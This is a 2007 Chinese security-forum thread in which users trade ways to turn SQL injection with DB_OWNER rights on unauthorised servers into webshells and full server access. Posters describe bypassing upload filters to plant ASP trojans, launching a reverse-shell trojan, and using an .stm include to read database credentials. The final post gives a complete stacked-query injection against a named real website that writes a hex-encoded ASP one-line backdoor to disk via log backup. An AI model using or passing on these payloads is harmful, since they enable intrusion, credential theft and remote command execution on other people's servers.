[讨论]当DB_OWNER权限遇到我。
DB_OWNER...头大了,头大了。
很多注入点,比如有4个注入点,注入1,只能列出C盘,不能列出D,注入2,可以列出E,不能列D.C...全部注入点都尝试列过目录,就是网站的目录列不出来,列出来的也没利用价值.都是些软件.I386文件等等...也无法上传.. .差异备份.拿下WEBSHELL.权限太死,拿不下.服务器
我主要是围绕着拿服务器权限..但我觉得可能性太小了.
等待乐意的朋友帮忙.本菜鸟感谢..
热爱安全的朋友加我为好友。 Q 61803200 呵呵,这么巧,我刚刚拿下一台2000服务器,也是DB_OWNER权限,遇到了一些和LZ类似的问题
一共三个注入点,同一域名下的三个不同站点,1.3都无法列目录,只有2可以,但是比LZ幸运,我可以列出所有分区的目录
但是无法上传和差异备份,提示成功,通过列目录后发现根本没有成功
由于上面挂了好多站,心想着找个mdb数据库,进个后台看看,结果发现几乎所有的站都是mssql,郁闷!
心有不甘随便查看目录的时候发现一个editor.htm,直觉让我打开看了下,是个简易的编辑器,有上传点
看了下源码是脚本过滤,将过滤条件去掉后上传asp马,返回的页面只有我上传的马的文件名1.asp,抓包看了下也没有信息
昏厥,再次传了一遍,返回的是1(1).asp,重命名?貌似是上传成功了
琢磨了下传个jpg文件试试,让我十分困惑的返回了文件地址,呵呵
顺利拿下webshell,上去看了下,内网,服务器安全性非常差,直接传了个反弹马,WScript.Shell直接运行就上线了 楼上 直接通过webshell 还执行的反弹马???/
貌似这个只在许多动画教程中看到过
一般webshell给的只是guest权限
你能执行木马. 运气真好... lz 为什么只是局限于通过webshell拿服务器呢 ?
为何不渗透试下...
如果webshell权限卡的很死
就不要吊在一个树上了 .... 可以找数据库连接文件,说不定有sa [s:264] [quote]引用第4楼huxin_hx于2007-08-25 14:15发表的 :
可以找数据库连接文件,说不定有sa [s:264][/quote]
权限分配的太死了.只有DB_OWNER权限....差异备份拿下WEBSHELL.
可惜没太大的利用DB_OWNER权限拿服务器! 你说权限死,可以建立个stm去包含数据库链接文件,不就可以看到mssql密码了 [quote]引用第6楼落叶纷飞于2007-08-25 16:47发表的 :
你说权限死,可以建立个stm去包含数据库链接文件,不就可以看到mssql密码了[/quote]
抱歉,本人菜,不明白具体操作.请赐教.. 新建一个txt文件,内容<!--#include file="conn.asp"-->
把txt后缀改成stm后缀,上传,请求文件
大概就是这样吧,不过我自己是没成功过 [quote]引用第8楼akens于2007-08-25 18:21发表的 :
新建一个txt文件,内容<!--#include file="conn.asp"-->
把txt后缀改成stm后缀,上传,请求文件
大概就是这样吧,不过我自己是没成功过[/quote]
谢谢老师,收下先了,今晚测试. 同一台服务器上不同的注入点能列不同的分区,感觉这个服务器很变态,mssql绝对不会是system启动的、我感觉找到sa帐号也没什么用。
另外我有一点疑惑,如果是给mssql分配了专用帐号启动,楼主说的这种情况也不可能出现,每个注入点的权限应该是一样的,不可能一台机器上装很多个mssql吧。
我认为出现楼主描述的情况只有一种可能,那就是楼主的注入点绝对不是同一个站点的。 [s:266] [quote]引用第6楼落叶纷飞于2007-08-25 16:47发表的 :
你说权限死,可以建立个stm去包含数据库链接文件,不就可以看到mssql密码了[/quote]
局限性太大,基于ssinc.dll的解析,如果删除了就没鸟
再则既然有DB权限,我们就能做很多事,拿到一个Webshell不是难事,有Webshell了当然也可以查看数据库连接文件了。 [quote]引用第10楼remax于2007-08-25 23:28发表的 :
同一台服务器上不同的注入点能列不同的分区,感觉这个服务器很变态,mssql绝对不会是system启动的、我感觉找到sa帐号也没什么用。
另外我有一点疑惑,如果是给mssql分配了专用帐号启动,楼主说的这种情况也不可能出现,每个注入点的权限应该是一样的,不可能一台机器上装很多个mssql吧。
我认为出现楼主描述的情况只有一种可能,那就是楼主的注入点绝对不是同一个站点的。 [s:266][/quote]
个人认为 一个站点的每个注入点的权限不一定一样的 要说的话应该是同一个注入点所在的ASP文件一样才对, 要是1.asp 2.asp连接的数据库不同 那就有可能是不同的MSSQL帐号了 那么权限当然也有可能不一样了. [s:270]
扼。。被人抓住小辫子了..我改改还不行。。
我这说,出现楼主描述的情况只有一种可能,那就是楼主的注入点绝对不是同一台DB服务器上的。
扼...
不管是什么mssql帐号,能列目录的,都是继承的mssql启动的那个权限,一般是system,某些变态服务器是给个users组权限..扼。。这次说的够明白了吧。。 [s:289] 感觉一个站,用多个数据库的比较少。但DB权限拿个shell还是机会很大的。 呵呵 13楼这样说就明白多了嘛
原创区貌似也出了个相关的动画教程 LZ可以去看看. 如果wenshell权限太死,一般找sa密码,ser-u提权,没有其他比较有效的方法了
那么你就试试嗅探和工程学吧 [quote]引用第2楼消失再消失于2007-08-25 11:35发表的 :
楼上 直接通过webshell 还执行的反弹马???/
貌似这个只在许多动画教程中看到过
一般webshell给的只是guest权限
你能执行木马. 运气真好...[/quote]
可以自己在webshell下测试一下能不能把马弹出来.
注册不成服务,写不了注册项,但是,部分马能运行.
虽然权限小的让人发指. DB_OWNER 权限用GETWEBSHELL备份拿SHELL出现以下错误提示请问怎么回事
///////////////////////////////////////////////////
Microsoft OLE DB Provider for SQL Server
错误 '80040e14'
第 1 行: '5' 附近有语法错误。
/qiye/gongqiu.asp,行9
////////////////////////////////////////////////////
没权限发帖,借楼主的光。知道的解释下谢谢 第 1 行: '5' 附近有语法错误
不认识汉字?语法错误。
[s:270]
抓包看看语句,自己改改,一般闭合了就行了。 .起码还有个webshell,已经非常不错了。
我最近遇到一个SA点,.net2.0+sql2005,sql语句传递参数运行,一执行insert delete等操作就报错,运行xp_cmdshell就返回超时,不能执行命令,web和data分离。
到现在还没拿到shell,郁闷的很。 在此想问个问题,db_owner 的权限,支持多语句,已经知道物理经,比如d:\jhgf1\
但用nbsi3.0getwebshell备份的时候,如d:\jhgf1\aa.asp (注aa.asp为webshell名)
能回显,第 一 步:
[url]http://www.jhgf.com.cn/news.asp?id=538[/url]';create table [dbo].[shit_tmp] ([cmd] [image])--
第 二 步
[url]http://www.jhgf.com.cn/news.asp?id=538[/url]';declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x7900690061006F006C007500 backup log @a to disk = @s with init,no_truncate--
第 三 步
[url]http://www.jhgf.com.cn/news.asp?id=538[/url]';insert into [shit_tmp](cmd) values(0x3C25657865637574652872657175657374282261222929253E)--
第 四 步
[url]http://www.jhgf.com.cn/news.asp?id=538[/url]';declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x64003A005C006A0068006700660031005C00610061002E00610073007000 backup log @a to disk=@s with init,no_truncate--
第 五 步
[url]http://www.jhgf.com.cn/news.asp?id=538[/url]';Drop table [shit_tmp]--
但访问文件aa.asp老是不存在,想问不成功的原因,是不是没有权限把文件写入,
以前成功过一次,拿不拿webshell是其次,想知道原因
页:
[1]